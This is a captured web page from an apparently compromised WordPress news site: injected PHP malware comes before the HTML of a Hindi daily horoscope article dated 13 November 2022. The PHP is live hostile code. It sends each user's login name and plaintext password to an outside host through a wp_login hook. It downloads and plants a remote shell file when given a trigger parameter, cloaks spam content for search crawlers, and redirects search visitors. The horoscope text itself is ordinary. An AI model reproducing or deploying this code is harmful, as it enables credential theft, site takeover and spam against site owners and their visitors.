if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US" class="dark-skin" data-skin="dark"> <head> <meta charset="UTF-8" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <meta http-equiv='x-dns-prefetch-control' content='on'> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//fonts.gstatic.com' /> <link rel='dns-prefetch' href='//s.gravatar.com' /> <link rel='dns-prefetch' href='//www.google-analytics.com' /> <link rel='preload' as='image' href='https://nationupdate.in/wp-content/uploads/2022/12/logo-nation.png'> <link rel='preload' as='image' href='https://nationupdate.in/wp-content/uploads/2022/11/Aaj-ka-rashifal.jpeg'> <link rel='preload' as='font' href='https://nationupdate.in/wp-content/themes/jannah/assets/fonts/tielabs-fonticon/tielabs-fonticon.woff' type='font/woff' crossorigin='anonymous' /> <link rel='preload' as='font' href='https://nationupdate.in/wp-content/themes/jannah/assets/fonts/fontawesome/fa-solid-900.woff2' type='font/woff2' crossorigin='anonymous' /> <link rel='preload' as='font' href='https://nationupdate.in/wp-content/themes/jannah/assets/fonts/fontawesome/fa-brands-400.woff2' type='font/woff2' crossorigin='anonymous' /> <link rel='preload' as='font' href='https://nationupdate.in/wp-content/themes/jannah/assets/fonts/fontawesome/fa-regular-400.woff2' type='font/woff2' crossorigin='anonymous' /> <link rel='preload' as='script' href='https://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js'> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /> <script type="text/javascript">try{if("undefined"!=typeof localStorage){var tieSkin=localStorage.getItem("tie-skin"),html=document.getElementsByTagName("html")[0].classList,htmlSkin="light";if(html.contains("dark-skin")&&(htmlSkin="dark"),null!=tieSkin&&tieSkin!=htmlSkin){html.add("tie-skin-inverted");var tieSkinInverted=!0}"dark"==tieSkin?html.add("dark-skin"):"light"==tieSkin&&html.remove("dark-skin")}}catch(t){console.log(t)}</script> <!-- This site is optimized with the Yoast SEO plugin v19.11 - https://yoast.com/wordpress/plugins/seo/ --> <title>Horoscope Today 13 November 2022
Astrologer

Horoscope Today 13 November 2022: मेष, सिंह, कन्या राशि वालों को देना होगा इन बातों पर ध्यान, सभी राशियों का जानें राशिफल…

Horoscope Today, Daily Horoscope, Aaj Ka Rashifal: पंचांग के अनुसार आज पंचमी तिथि रहेगी. आज सुबह 10:17 तक आद्र्रा नक्षत्र फिर पुनर्वसु नक्षत्र रहेगा. आज ग्रहों से बनने वाले वाशि योग, आनन्दादि योग, सुनफा योग, बुधादित्य योग, लक्ष्मी योग, साध्य योग का साथ मिलेगा. अगर आपकी राशि मिथुन, कन्या, धनु, मीन राशि है तो हंस योग व मेष, कर्क, तुला, मकर राशि है तो शश योग का लाभ मिलेगा. चन्द्रमा मिथुन राशि में रहेगे. सुबह 10:15 से 12:15 बजे तक लाभ-अमृत का चौघड़िया एवं दोपहर 02:00 से 03:00 बजे तक शुभ का चौघड़िया रहेगा. वहीं दोपहर 04:30 से 06:00 बजे तक राहुकाल रहेगा. आइए जानते हैं आज का आपका दिन कैसा रहेगा।

मेष राशि (Aries Horoscope) 

डेली नीड्स बिजनेस के बारे में सामान्य रूप से चिंतित और चिंतनशील रहेंगे. लेकिन दोपहर बाद आपकी चिंताएं धन के आगमन से दूर हो जाएगी. वर्कस्पेस पर आप मुर्खों के साथ गंभीर मुद्दों पर चर्चा करने में अपना समय और कार्य बर्बाद कर सकते हैं. आप रविवार की शाम को अपने परिवार के सदस्यों के साथ एक बढ़िया समय बिता सकते हैं. विद्यार्थियों के लिए दिन मध्यम फलदायक रहेगा. आपको स्वास्थ्य समस्या विकसित होने या घायल होने की संभावना है. आपको परहेजी खाना, खाना चाहिए और कुछ व्यायाम करना चाहिए. 

वृषभ राशि (Taurus Horoscope)

कॉस्मेटिक बिजनेस में अपने नियमित काम करने के लिए ऊर्जा से आप अपने बिजनेस को कम समय में नई ऊंचाईयों पर ले जाने में सफलता प्राप्त करेंगे. साध्य योग के बनने से वर्कस्पेस पर आपका सकारात्मक दृष्टिकोण आपको अपने जीवन में काफी ले जाएगा. आप अपनी कार्यशैली से सभी को कायल करने में सफल होंगे. लेकिन आप फिर भी विरोधियों से सतर्क रहें. करियर के क्षेत्रों में सफलता मिल सकती है. आपका पारिवारिक और वैवाहिक जीवन सामंजस्यपूर्ण रहेगा. आपके माता-पिता या ससुराल वाले आपके लिए आशीर्वचन कहेंगे. विद्यार्थियों अपनी पढ़ाई पर ध्यान केंद्रित कर पाएंगे. आपके स्वास्थ्य सितारे दुर्बलता और बीमारी का संकेत देते हैं.

मिथुन राशि (Gemini Horoscope)

तेल और रसायन से जुड़े बिजनेस में परेशानियों का सामना करना पड़ेगा लेकिन आप पूरे आत्मविश्वास से अपने बिजनेस को पटरी पर लाने के प्रयास में जुटे रहेंगे. आपके करियर व व्यवसाय की उन्नति बनी हुई रहेगी. सभी प्रकार की खुशहाली के संकेत हैं. आपकी कोई एक मूल्यवान वस्तु खोने की संभावना है. अपना सामान सावधानी से रखें. अपनी संतानों के साथ संवेदनशील मुद्दों पर चर्चा करेंगें. वासी और सुनफा योग के बनने से विद्यार्थियों चिंताओं को दूर करके कोशिशों को सफलता के मुकाम तक पहुंचा कर ही रहेंगे. आपको अपनी कार्यशैली के साथ-साथ अनुशासन सिद्ध करने का अवसर मिलेगा.

कर्क राशि (Cancer Horoscope) 

बिजनेस में आपके काम सामान्य गति से भी आगे नहीं बढ़ेंगे. कुछ कार्यों में आपको परेशानियों का सामना करना पड़ेगा. अपने महत्वपूर्ण कार्यों को स्थगित न करें अन्यथा आप अपने लिए एक जटिल स्थिति बना सकते हैं. वर्कस्पेस पर काम से संबंधित परियोजनाओं के लिए दिन सामान्य नहीं होगा. आप कठोर और अप्रिय शब्द बोल सकते हैं जो आपके माता-पिता व जीवनसाथी के दिल को ठेस पहुंचा सकती है. पारिवारिक कलह में फंसने की संभावना है. खिलाड़ियों पावर बढ़ाने के चक्कर में किसी गलत संगत में पड़ सकते है. सेहत को लेकर सतर्क हो जाएं.

सिंह राशि (Leo Horoscope)

आप एक ऑनलाइन परियोजना पर अपना पैसा और समय लगा सकते हैं. किसी भी प्रकार के निवेश करने की प्लानिंग बना रहे हैं, तो प्रातः 10:15 से 12:15 और दोपहर 2:00 से 3:00 के मध्य करना आपके लिए शुभफलदायी रहेगा. एकाग्रता और दक्षता के साथ अपने पेशेवर प्रोजेक्ट पर काम कर पाएंगे. आप अपने वर्कस्पेस पर सहकर्मियों और उच्च स्तर अधिकारियों का विश्वास जीतने में सफल होंगे. घर के मोर्चे पर अव्यवस्था और गड़बड़ होगी. आपका पारिवारिक और वैवाहिक जीवन सामान्य रहेगा. प्रतियोगी विद्यार्थियों को आलस्य का त्याग करते हुए अपने फील्ड में बेहतर करने में जूटे रहेंगे. मौसम परिवर्तन को लेकर सेहत के मामले में सतर्क रहें.

कन्या राशि (Virgo Horoscope)

साध्य, सुनफा और वासी योग के बनने से सौंदर्य और वस्त्र आदि के बिजनेस में बड़े सौदे बड़ा लाभ दे सकते हैं. आय में वृद्धि होगी. निवेश शुभ रहेगा. भाग्य का साथ रहेगा. व्यापार-व्यवसाय में मनोनुकूल लाभ होगा. शेयर बाजार और म्युचुअल फंड में सोच-समझकर हाथ डालें. जल्दबाजी न करें. समय अनुकूल है. नौकरी में अनुकूलता रहेगी. प्रसन्नता रहेगी. भाग्योन्नति के प्रयास सफल रहेंगे. रोजगार प्राप्ति सहज ही होगी. किसी बड़ी समस्या का हल प्राप्त होगा. प्रसन्नता रहेगी. दूसरों के काम में हस्तक्षेप न करें. परीक्षा व साक्षात्कार आदि में सफलता प्राप्त होगी. अपनी माँ का भावनात्मक साथ-साथ शारीरिक स्वास्थ्य का भी ध्यान रख सकेंगे.  

तुला राशिफल (Libra Horoscope) 

आज किसी काम को पूरा करने के लिए आपका विश्वास अडिग रहेगा और आप अपने खर्चों की एक सूची बनाएं,तो यही आपके लिए बेहतर रहने वाला है। आप बिना सोचे समझें किसी नए निवेश में हाथ नहीं डाल सकते हैं जिससे आपको बाद में समस्या होगी। परिवार के किसी सदस्य की सेहत में यदि पहले से कुछ गिरावट चल रही थी,तो  उनके कष्ट बढ़ सकते हैं जिसके बाद आप भागदौड़ में लगे रहेंगे। आपका कोई मित्र आपकी सेहत को लेकर आपसे बातचीत कर सकता है। अध्ययन व अध्यात्म के कार्यों में आप बढ़ चढ़कर हिस्सा लेंगे,जिससे आपके कुछ नये मित्र भी बनेंगे और आपको कुछ नए नेताओं से मिलने का मौका भी अवश्य मिलेगा।

वृश्चिक राशिफल (Scorpio Horoscope)

